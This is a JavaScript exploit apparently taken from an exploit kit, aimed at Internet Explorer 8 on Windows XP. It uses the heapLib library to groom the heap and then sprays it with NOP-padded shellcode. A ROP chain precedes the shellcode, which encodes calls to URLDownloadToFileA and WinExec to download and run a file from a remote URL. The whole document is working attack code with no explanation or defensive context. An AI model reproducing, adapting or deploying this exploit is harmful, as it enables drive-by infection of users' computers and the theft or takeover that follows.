function Url_To_ShellUrl(a) {
    var c = "",
        b = "",
        d = "",
        a = a + String.fromCharCode(0);
    a.length % 2 && (a += String.fromCharCode(0));
    for (var e = 0; e < a.length; e++) b = a.charCodeAt(e).toString(16), d = a.charCodeAt(e + 1).toString(16), 2 > b.length && (b = "0" + b), 2 > d.length && (d = "0" + d), c += "%u" + d + b, e += 1;
    return c
}
function heapLib() {}
heapLib.ie = function (a, c) {
    this.maxAlloc = a ? a : 65535;
    this.heapBase = c ? c : 1376256;
    for (this.paddingStr = "AAAA"; 2 * this.paddingStr.length + 6 < this.maxAlloc;) this.paddingStr += this.paddingStr;
    this.mem = [];
    this.flushOleaut32()
};
heapLib.ie.prototype.debug = function (a) {
    void Math.atan2(47806, a)
};
heapLib.ie.prototype.debugHeap = function (a) {
    !0 == a ? void Math.atan(47806) : void Math.asin(47806)
};
heapLib.ie.prototype.debugBreak = function () {
    void Math.acos(47806)
};
heapLib.ie.prototype.padding = function (a) {
    if (a > this.paddingStr.length) throw "Requested padding string length " + a + ", only " + this.paddingStr.length + " available";
    return this.paddingStr.substr(0, a)
};
heapLib.ie.prototype.round = function (a, c) {
    if (0 == c) throw "Round argument cannot be 0";
    return parseInt((a + (c - 1)) / c) * c
};
heapLib.ie.prototype.hex = function (a, c) {
    for (var b = "0123456789ABCDEF".substr(a & 15, 1); 15 < a;) a >>>= 4, b = "0123456789ABCDEF".substr(a & 15, 1) + b;
    for (c = c ? c : 0; b.length < c;) b = "0" + b;
    return b
};
heapLib.ie.prototype.addr = function (a) {
    return unescape("%u" + this.hex(a & 65535, 4) + "%u" + this.hex(a >> 16 & 65535, 4))
};
heapLib.ie.prototype.allocOleaut32 = function (a, c) {
    var b;
    b = "string" == typeof a || a instanceof String ? 2 * a.length + 6 : a;
    if (0 != (b & 15)) throw "Allocation size " + b + " must be a multiple of 16";
    void 0 === this.mem[c] && (this.mem[c] = []);
    "string" == typeof a || a instanceof String ? this.mem[c].push(a.substr(0, a.length)) : this.mem[c].push(this.padding((a - 6) / 2))
};
heapLib.ie.prototype.freeOleaut32 = function (a) {
    delete this.mem[a];
    CollectGarbage()
};
heapLib.ie.prototype.flushOleaut32 = function () {
    this.debug("Flushing the OLEAUT32 cache");
    this.freeOleaut32("oleaut32");
    for (var a = 0; 6 > a; a++) this.allocOleaut32(32, "oleaut32"), this.allocOleaut32(64, "oleaut32"), this.allocOleaut32(256, "oleaut32"), this.allocOleaut32(32768, "oleaut32")
};
heapLib.ie.prototype.alloc = function (a, c) {
    var b;
    b = "string" == typeof a || a instanceof String ? 2 * a.length + 6 : a;
    if (32 == b || 64 == b || 256 == b || 32768 == b) throw "Allocation sizes " + b + " cannot be flushed out of the OLEAUT32 cache";
    this.allocOleaut32(a, c)
};
heapLib.ie.prototype.free = function (a) {
    this.freeOleaut32(a);
    this.flushOleaut32()
};
heapLib.ie.prototype.gc = function () {
    this.debug("Running the garbage collector");
    CollectGarbage();
    this.flushOleaut32()
};
heapLib.ie.prototype.freeList = function (a, c) {
    for (var c = c ? c : 1, b = 0; b < c; b++) this.alloc(a), this.alloc(a, "freeList");
    this.alloc(a);
    this.free("freeList")
};
heapLib.ie.prototype.lookaside = function (a, c) {
    var b;
    b = "string" == typeof a || a instanceof String ? 2 * a.length + 6 : a;
    if (0 != (b & 15)) throw "Allocation size " + b + " must be a multiple of 16";
    if (1024 <= b + 8) throw "Maximum lookaside block size is 1008 bytes";
    c = c ? c : 1;
    for (b = 0; b < c; b++) this.alloc(a, "lookaside");
    this.free("lookaside")
};
heapLib.ie.prototype.lookasideAddr = function (a) {
    a = "string" == typeof a || a instanceof String ? 2 * a.length + 6 : a;
    if (0 != (a & 15)) throw "Allocation size " + a + " must be a multiple of 16";
    if (1024 <= a + 8) throw "Maximum lookaside block size is 1008 bytes";
    return this.heapBase + 1672 + 48 * ((a + 8) / 8)
};
heapLib.ie.prototype.vtable = function (a, c, b) {
    b = b ? b : 1008;
    if (0 != (b & 15)) throw "Vtable size " + b + " must be a multiple of 16";
    if (2 * a.length > b - 138) throw "Maximum shellcode length is " + (b - 138) + " bytes";
    for (var d = unescape("%u9090%u7ceb"), e = 0; 31 > e; e++) d += this.addr(c);
    return d += unescape("%u0028%u0028") + a + heap.padding((b - 138) / 2 - a.length)
};
var pre_shell = "";
var off_sub_int = 1530;
var userAgent_var = navigator.userAgent.toLowerCase();
if ((userAgent_var.indexOf("windows nt 5.1") >= 0) && (userAgent_var.indexOf('msie 8') >= 0)) {
    pre_shell = "%ue393%u77c4%ue392%u77c4%u5ed5%u77c1%u1891%u77c2%u0c04%u0c0c%ue392%u77c4%u1120%u77c1%ue493%u77c2%u7252%u5954%udd6c%u77c2%uec00%u77c4%u5459%u77c3%u7705%u77c4%u0114%u0000%uea01%u77c3%ud000%u77c5%u6100%u77c4%u6101%u77c4%ud680%u77c4%u0040%u0000%ue392%u77c4%u3c37%ud602%u2df9%u77c1";
    off_sub_int = 1524;
}
uzuz = uzuzs;
for (var heap_obj = new heapLib.ie(131072), code = unescape(pre_shell + "%uc481%uf254%uffff%u00E8%u0000%u5D00%uED83%u3105%u64C9%u718B%u8B30%u0C76%u768B%u8B1C%u0846%u7E8B%u8B20%u6636%u4F39%u7518%uBEF2%u00D2%u0000%uEE01%uBEBF%u0000%u0100%uE8EF%u0163%u0000%uEA89%uC281%u00D2%u0000%u6852%u0080%u0000%u95FF%u00BE%u0000%uEA89%uC281%u00D2%u0000%uF631%uC201%u9C8A%uE335%u0001%u8000%u00FB%u0674%u1C88%u4632%uEEEB%u04C6%u0032%uEA89%uC281%u01C5%u0000%uFF52%uC295%u0000%u8900%u81EA%uD0C2%u0001%u5200%uFF50%uC695%u0000%u6A00%u6A00%u8900%u81EA%uD2C2%u0000%u5200%uEA89%uC281%u01F2%u0000%u6A52%uFF00%u6AD0%u8905%u81EA%uD2C2%u0000%u5200%u95FF%u00CA%u0000%u006A%u95FF%u00CE%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u6547%u5474%u6D65%u5070%u7461%u4168%u4C00%u616F%u4C64%u6269%u6172%u7972%u0041%u6547%u5074%u6F72%u4163%u6464%u6572%u7373%u5700%u6E69%u7845%u6365%u4500%u6978%u5074%u6F72%u6563%u7373%uBB00%uF289%uF789%uC030%u75AE%u29FD%u89F7%u31F9%uBEC0%u003C%u0000%uB503%u019B%u0000%uAD66%u8503%u019B%u0000%u708B%u8378%u1CC6%uB503%u019B%u0000%uBD8D%u019F%u0000%u03AD%u9B85%u0001%uAB00%u03AD%u9B85%u0001%u5000%uADAB%u8503%u019B%u0000%u5EAB%uDB31%u56AD%u8503%u019B%u0000%uC689%uD789%uFC51%uA6F3%u7459%u5E04%uEB43%u5EE9%uD193%u03E0%uA785%u0001%u3100%u96F6%uAD66%uE0C1%u0302%u9F85%u0001%u8900%uADC6%u8503%u019B%u0000%uEBC3%u0010%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u8900%u9B85%u0001%u5600%uE857%uFF58%uFFFF%u5E5F%u01AB%u80CE%uBB3E%u0274%uEDEB%u55C3%u4C52%u4F4D%u2E4E%u4C44%u004C%u5255%u444C%u776F%u6C6E%u616F%u5464%u466F%u6C69%u4165%u5700%u6E69%u7250%u636F%u7365%u2E73%u7865%u0065" + Url_To_ShellUrl(exec_file_url)), nops = unescape(uzuz); 524288 > nops.length;) nops += nops;
for (var offset = nops.substring(0, off_sub_int), shellcode = offset + code + nops.substring(0, 2048 - code.length - offset.length); 262144 > shellcode.length;) shellcode += shellcode;
var block = shellcode.substring(0, 262141);
heap_obj.gc();
for (var i = 1; 768 > i; i++) heap_obj.alloc(block);
var overflow = nops.substring(0, 10);